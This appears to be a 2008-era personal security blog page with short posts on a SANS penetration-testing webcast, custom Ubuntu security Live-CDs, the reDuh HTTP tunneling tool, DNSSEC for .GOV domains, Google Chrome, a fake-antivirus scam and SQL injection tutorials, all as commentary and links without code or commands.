Nicholson Security

Review: SANS Pen Test Webcast Part 1

Yesterday was the SANS Webcast on “Combining Network, Web App and Wireless into the Ultimate Penetration Test,” I had registered to catch it live but my lunch break disappeared under a pile of deadlines. Today I was able to catch the archive of the presentation.

The focus of the webcast was as the title describes, using combined methods and attack vectors during a penetration test. Sometimes depending on the client requirements, a pen test will be requested but with a very limited scope. For example they might only want their wireless network tested or a public facing web application. Usually due to either lack of interest or cost some companies will not get the full Monte? I think this is bad because the results provided from the pen test are only part of the picture. I think that if a business is going to have a pen test conducted it should cover all the potential attack vectors. Otherwise a business might have a false sense of security.

More »

What security programs would be on your dream Live-CD?

I was going to write a post about Samurai Web Testing Framework but someone already beat me to it.  It’s a good post so I wanted to pass along the link.  I really hate seeing the same topic covered the same way over and over again.

Instead I am going to talk a little about the idea of making your own Security Live-CD.  Samurai WTF was the first Live-CD I have used that was built on Ubuntu.  I have been using Ubuntu since 5.04 and was really happy to see a familiar GUI.  I noticed that all Samurai WTF was essentially, is Ubuntu with a bunch of cool web pen-testing programs preloaded and Firefox preloaded with some cool web pen-testing add-on’s and the best themed Live-CD bar none.

This got me thinking about an article I read earlier this week at Linux.com about a program called Ubuntu Customization Kit (UCK).  With UCK you can take an existing install of Ubuntu, Kubuntu, Edubuntu or Xubuntu and create your own pre-configured Ubuntu Live-CD.  Just like Samurai WTF and even BackTrack (except BT uses Slax).

More »

reDuh - TCP Redirection over HTTP

Have you ever wondered why free web host don’t give you ASP/JSP/PHP access?  Here is one really good reason.  SensePost reDuh is a dynamic web page that can be used to bypass a firewall when you upload the reDuh dynamic web page on to a web server.  It allows you to connect to the web page, then build a TCP circuit to reach the nodes inside the network.

Think web site defacement’s are bad for your companies image?  Imagine someone using something like this to have full access into your companies network.  I’m going to test this when I have the time but I thought if some of you hadn’t read about this presentation at BlackHat I would share it with you.

Make sure your web servers are hardened and that your firewall is properly patched and configured to monitor both ingress and egress between the world, your web server, and your company intranet.  Remember defense-in-depth is a process not a bullet proof plan.  Also make sure your other intranet systems are patched and monitored.

I’ll post more when I have more time with reDuh.  If you have already tested this tool I would like to know what you think in the comments.

Can you say knee jerk reaction?

I know since the DNS vulnerability that was announced a while back a lot of people have been making plans to move to DNSSEC.  Well now the government has set a mandate to move all the .GOV domains to DNSSEC.

I am all for DNSSEC because at this time it is the best working model to reduce the risk that threaten traditional DNS.  My concern is how is this “mandate” going to be implemented?  DNSSEC is not a simple task to deploy.   I can’t imagine that anyone is claiming this won’t be a major undertaking.  You have the RRSIG, the DNSKEY, the DS, and the NSEC which are all new records that need to be created and validated.  In addition to the control of the private key used for signing.

InfoSecEvents has more about the top level .GOV domains moving to DNSSEC here. I would like to know if your company is considering going to DNSSEC so please post in the comments your views.

I really think DNSSEC is a good logical next step but I worry about this being more a “knee jerk reaction” rather then a well laid plan.  I would like to know what your thoughts are on DNSSEC?  Please post in the comments.

Google Chrome

I downloaded Google Chrome earleir today and so far I really like it.  The only real use for it I would have at this time would be as a wrapper for my Google services like Gmail and Analytic’s.  For those that want to know about the security side check out this post from RioSec on “Google Chrome Security First Look.”  It’s to early to say, but I think based on first impressions Chrome looks like a step in the right direction for security.  This is Googles first BETA release so I would still consider it ALPHA until a few updates are released.  I guess it’s nice they planned ahead for that.  It seems everytime you launch Chrome it checks for updates.  We will also need to wait and see how the third-pary plugins are added  in the future.  This will also have a significant impact on the security of the Chrome browser.  I posted yesterday about the thread of thrid-party plugins after the IBM ISS X-Force mid-year report which you can read about here.

If your one of the brave few who also jumps in early let me know about your experience with Google Chrome in the comments.

Anatomy of a malware scam

I see from my Google Analytic’s that lots of you are interested in my post on the Antivirus malware scam going around. I read a great post today from The Register about the “Anatomy of a malware scam” that uses the Antivirus 2009 malware for the basis of the whole article.

I wanted to give those looking for more information about what is “under the hood” of a scam like this the link. I warn you it is very long and detailed post so if you really aren’t that curious about the technical aspects of the scam I would skip it. For those of you that do read it out let me know in the comments what you thought about it.

SQL Injection for Dummies

I have been working on a article/lecture about SQL Injection for a class I am teaching.  Today I found a post on Hackanoia about SQL Injection attacks on IIS/ASP platforms.  I am working on one that focuses on the LAMP stack since that is the dominant platform on the Web.

What is nice about this article is that many business websites are using the IIS/ASP model for enterprise and commercial web applications.  Since I’m working in a different direction I wanted to provide a link to this great post.

It tells you everything you need to setup your test environment and how to go about testing.  I would suggest anyone interested in SQL Injection attacks to check out this article and let me know what you think.  I am new to web pen-testing but the post seems complete.  If you have a chance to follow it please post your comments below.  If you have other sites that cover SQL Injection or other Injection Flaws please post them in the comments.

Related:

• Defending against SQL injections
• Blind SQL injections for dummies

Samurai Web Testing Framework

Last week I had a student ask me about website pen-testing programs.  I told him about a new framework I had heard about called Samurai Web Testing Framework.  Samurai WTF is a Live-CD that uses Ubuntu as the host OS. It comes preloaded with several popular programs that are used for testing websites and web applications.

I haven’t had much time to investigate this tool but it seems like BackTrack for Web Testers. I have to say from a themes point of view I really like the “samurai” and “Edo” splash screens and wallpaper I think it adds some nice details.

You can visit the main website here and download the first version of the Live-CD here. You will need to login as User “samurai” and Password “samurai” I got lucky on my second try logging in. Once you login the README gives you the user name and password. I thought that was funny…

I would like to have time to try this out but I don’t see that happening anytime soon.  I would really like to hear from anyone using this tool.  If you do download it and try it out please post comments on what you think about it.  I will post a follow-up when I have the time.